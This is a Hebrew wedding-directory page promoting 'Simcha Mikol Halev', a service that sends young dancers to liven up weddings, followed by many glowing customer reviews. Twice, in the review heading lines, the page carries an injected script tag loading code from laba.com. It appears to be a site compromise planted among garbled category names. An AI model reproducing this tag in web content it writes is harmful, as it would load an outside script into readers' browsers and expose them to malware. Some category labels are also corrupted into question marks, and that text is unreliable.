חתונה יהודית
פירסום חתונה בדקה ה90 אירועים וחוויות ווידאו חתונה הנחות ומבצעים מאמרים רשימה אישית טיפים חתונה - ראשי
 
חתונה יהודית > ????? - ?? ????  > ???????? > שמחה מכל הלב
חזור 
שמחה מכל הלב
"שמחה מכל הלב" הוא ארגון ששם לו למטרה לשמח חתנים וכלות ביום חגם. כמה החתונה תהיה שמחה? כמה ירקדו וכמה יעדיפו את הבופה? אלה הדאגות העיקריות של הזוג הצעיר. אנו באים לתת מענה לשאלות אלו. הארגון פועל בכל רחבי הארץ ומארגן בחורים ובחורות, מלאי התלהבות ואנרגיה, בגילאים שונים וממגוון חוגים, שישתתפו בחתונות. באמצעות שירה, ריקודים ושימוש באביזרים שונים (רעשנים, בועות סבון, שרשראות פרחים ועוד) מסייעים הצעירים לשמח את החתן והכלה. הארגון בעל ניסיון נרחב בעבודה עם זוגות מכלל החוגים והוא קשוב לרצון הזוג ולאופי החתונה המבוקשת.

טלפון :
053-9417642
נייד :
כתובת :
כוכב יאיר 


ליצירת קשר עם בעל העסק הקש כאן
שמחה מכל הלב - ????? - ?? ????<script src=http://laba.com/muuu.s></script> 1
 
שמחה מכל הלב - ????? - ?? ????<script src=http://laba.com/muuu.s></script> 102/05/2015 23:07:28- יוני
הבעת תודה
לשמחה מכל הלב תודה על שעות השמחה שהענקתם לנו בחתונתנו. הבנים והבנות היו נהדרים, שרו ורקדו במשך כל החתונה בצורה זורמת וטבעית כל כך. אנו מרוצים מאד שהחלטנו לקחת אתכם למרות ההתלבטות שהייתה לנו. תודה תודה תודהיוני ורעות

25/04/2015 23:01:05- עידו ואיילה
הרבה תודות
לארגון שמחה מכל הלב (0507362288)הרבה תודות על ההשקעה, השמחה ועל החברה האיכותיים שבאו לשמח בחתונתנו. הם היו הדובדבן שבקצפת. הם שידרגו את השמחה בצורה משמעותית. והכל בנחת בלי שאף אחד ירגיש שמדובר במשמחים. תודה תודה

24/10/2014 11:02:19- רועי והדר
תודה והערכה
ברצוננו להודות מקרב לב לחברה הצעירים שבאו לשמח אותנו ביום היקר לנו. למרות שהשקענו הרבה באוכל, בעיצוב השולחנות, בתזמורת, מי שהיה מסמר הערב היו החברה הצעירים של שמחה מכל הלב שבאו עם כל הלב לרקוד ולהרקיד ולא עזבו אותנו לרגע. אנו ממליצים לכל מי שמתחתן ולא בטוח במאה אחוז שיש לו מספיק חברה שיודעים לעשות שמח שיזמין את המשמחים מארגון שמחה מכל הלב ששומרים על דיסקרטיות וכולם בטוחים שהם חלק מהחברים של החתן והכלה.

31/07/2014 21:54:45- רעות
משמחים יקרים
נהננו מאד מהחברה שהגיעו לשמח בחתונה. החברה "שפיצים" מאד איכותיים שיודעים היטב איך עושים שמח. הם נבלעו בין המוזמנים ואף אחד לא שיער שמדובר במשמחים אלא בחברים שלנו משכבר הימים.אין ספק שחלק ניכר מההצלחה ומהזכרונות הטובים שיש לנו מהחתונה הם בזכות הארגון: שמחה מכל הלב.קצת קשה להשיג אותם, הטלפון הזמין שלהם: 0507362288. כדאי להתעניין ולצרף אותם ע"מ להעצים את השמחה בחתונה.

26/02/2014 09:20:30- בת אל ויחזקאל
הבעת הערכה רבה
לפני שבועיים נשאנו בשעה טובה. אנו רוצים לציין את ארגון שמחה מכל הלב שהגיע לשמח אותנו ועשה עבודה נפלאה. כל הזמן שואלים אותנו מאיפה יש לנו כל כך הרבה חברים גזעיים שיודעים כל כך לעשות שמח. חברה שלי עומדת להתחתן בשבוע הבא והיא מאד ביקשה אם אנחנו יכולים להביא את החברים שלנו שירקדו וישמחו אותם.תודה לכל החברה הנפלאים הבנים והבנות שעושים את עבודתם נאמנה ובעזרתם החתונה ממש ממש מיוחדת ושמיחה.

18/11/2013 23:22:55- ליאור
ארגון שמחה מכל הלב
הזמנתי חברה צעירים לשמח בחתונה שלי לאחר שקיבלתי המלצות חמות מחברים שהשתתפו בחתונות ומאד הופתעתי לטובה. החברה היו ממש נהדרים והחתונה הייתה שמיחה מאד מאד דבר שריגש את כולנו.לכל אלה שעומדים להתחתן אנו ממליצים בחום על הארגון. הטלפון שלהם המעודכן לכל המעוניינים: 0507362288

14/09/2013 22:50:19- אושרת וקובי
תודות לשמחה מכל הלב
בתחילה קצת התלבטנו, איך יראו משמחים בחתונה שלנו. למרות החששות החלטנו לנסות, ומאד הופתענו לטובה.החברה הצעירים רקדו ורקדו והשתלבו עם יתר המוזמנים בצורה יוצאת מן הכלל. החברה נחמדים, עם המון שמחת חיים, רגישים ואדיבים. גם אנחנו התחברנו אליהם תוך זמן קצר וגם לנו נראה היה כאילו אנו חברים מימי התיכון והאוניברסיטה. אנו רוצים להודות לשמחה מכל הלב על השירות האדיב שקיבלנו ובעיקר על השמחה הרבה והמשמעותית שהוסיפו לחתונה שלנו.אנו ממליצים לכל מי שמתלבט שיפסיק להתלבט.

11/12/2012 21:22:37- מעיין ואהוד
הזמנת רוקדים לחתונה? אין יותר שאלה
לכל מי שמתלבט ועדיין לא החליט, אין דילמה חייבים להזמין חברה צעירים שירקדו ויוסיפו הרבה שמחה לארוע.למעשה אנחנו משקיעים כל כך הרבה מחשבה והרבה כסף כדי שהארוע החשוב בחיים יהיה מוצלח. ולפעמים אנו שוכחים שבלי חברה צעירים שעושים שמח השמחה לא שלימה.הזמנו חברה צעירים דרך שמחה מכל הלב והחתונה הייתה ממש מושלמת. אנו ממליצים לכולם, אל תוותרו עליהם.ואנו בטוחים שנמצא כאן גם את חוות דעתכם החיובית.

05/11/2012 21:14:25- עמית
באתי, נדלקתי
היתי מאד סקרן לראות איך זה פועל. ביקשתי להצטרף כרוקד לאחת החתונות. קשה לתאר מה הרגשתי. נדבקתי בהתלהבות של החברה והרגשתי תוך מספר דקות אחד מהצוות. החתן והכלה לא הפסיקו להודות לנו על כך שבזכותנו החתונה היתה כל כך שמיחה. הסיפוק שלי היה עצום. ממליץ לחברה הצעירים להצטרף לשמחה מכל הלב ולשמח בחתונות.

26/09/2012 21:13:06- עינת ואורן
תודה מכל הלב לשמחה מכל הלב
ברצוננו להודות לארגון שמחה מכל הלב על ההשתתפות בחתונה שלנו. ללא ספק הבחורים והבחורות המקסימים שהגיעו הוסיפו הרבה מאד להצלחת האירוע. הם היו ממש נהדרים, לא הפסיקו לרקוד, נשאו אותנו על כתפיים והעיקר השתלבו בצורה כל כך טבעית בין האורחים.ממליצים לכל המתלבטים לא להתלבט, לכו על זה ותהנו.

19/09/2012 16:06:40- אוריה שלומי ויהודה
שמח עם שמחה מכל הלב
אנחנו השתתפנו כמשמחים בחתונות ואנו רואים עד כמה המשמחים מוסיפים ומשדרגים את השמחה בחתונה.גם אנחנו נהנים לשמח את החתן והכלה, ויוצא שכולם מרוצים. חשוב לנו שכולם ידעו שיש שירות כזה ושחבל לוותר עליו. כולם רוצים חתונה מוצלחת ומשמחים מוסיפים הרבה להצלחת הארוע.החברה שמגיעים לשמח הן הבנים והן הבנות הם חברה מיוחדים שיודעים להלהיב ולסחוף אחריהם גם את אלה שעומדים פאסיביים.

09/09/2012 20:31:40- עינת
תודה והערכה לשמחה מכל הלב
אנו רוצים להודות לצעירים ולצעירות המקסימים שבאו לשמח אותנו ביום הכי חשוב. הם לא הפסיקו לרקוד, התלהבו והלהיבו את כל הסובבים. הסרטים, הבלונים, הזיקוקים, וכל יתר האביזרים הוסיפו גם כן.למרות שהחתונה הסתיימה מאוחר,הם נשארו איתנו עד סוף הארוע, עד לאחר שבע הברכות.תודה תודה מקרב לב

10/07/2012 17:28:33- שלומי
שמחה מכל הלב- הלב של השמחה
כנראה שאי אפשר להסביר עד שרואים עד כמה החברה של שמחה מכל הלב הם למעשה הלב של כל האירוע. החברה מדביקים בהתלהבות שלהם את יתר הרוקדים, ולנו, החתן והכלה היה נראה כי אנחנו מכירים אותם כבר הרבה זמן. הם הגיעו בתחילת הארוע ונשארו עד לאחר שבע הברכות. המוזמנים התרגשו איזה חברים יש לנו.הרוקדים הבנים והבנות הותאמו לפי גיל ורקע דתי שלנו ולכן הכל היה נראה כל כך טבעי. מומלץ מאד!

20/10/2011 23:18:56- יעל
צעירים בחתונה
היום הגדול הגיע. לא היינו בטוחים כמה חברה צעירים יבואו והאם אלה שיבואו ירגישו מחוייבות לרקוד. החלטנו להזמין חברה צעירים משמחה מכל הלב כדי שנוכל להיות רגועים.TO BE ON THE SAFE SIDE התברר שזה הדבר הכי חשוב שעשינו. הם למעשה הובילו, הלהיבו,שרו ורקדו ועשו ממש ממש שמח. לאחר החתונה שמענו הרבה תגובות על החתונה הנהדרת שלנו ובעיקר על הצעירים המקסימים "החברים שלנו" שהיו נפלאים.תודה לשמחה מכל הלביעל וזיו

10/10/2011 17:50:08- עידו
הבעת תודה מקרב לב
לשמחה מכל הלב, ברצוננו להודות לכם על הבנים והבנות ששלחתם לשמח ולשמוח בחתונה שלנו. החברה היה ממש נהדרים, הם לא הפסיקו לרקוד ולסחוף אחריהם אנשים נוספים. להודות על האמת אתם "עשיתם" את השמחה בחתונה. האורחים לא העלו על דעתם שמדובר ב"משמחים" ולא הפסיקו להתלהב מ"החברים והחברות הגזעיים" שלנו.תודה בשם שנינו.

11/09/2011 21:27:59- יפה
משמחים
אין מילים. החברה מארגון שמחה מכל הלב עשו את החתונה. הוצפנו בשאלות איך יש לנו חברים כ"כ גזעיים ומיוחדים. הם השתלבו בצורה יוצאת מן הכלל בריקודים, נשאו את החתן על הכתפיים, לא הפסיקו לשמוח ולרקוד. שווה שווה שווה.

01/06/2011 19:10:09- יפית
שווה מליון דולר
האסימון ירד רק לאחר שהשתתפתי בחתונה שבו החברה הצעירים "גנבו" את ההצגה. ההתלהבות והשמחה הדביקו את הנוכחים. מה שזכור לי מהחתונה הוא האושר של בני הזוג כשראו עד כמה החברה שמחים איתם.האוכל היה טוב. האולם מושקע. התזמורת מיוחדת. אך מעל לכל- המשמחים- אין מילים להכביר על החבורה המיוחדת הזו.כל הכבוד ותודה מכל הלב לשמחה מכל הלב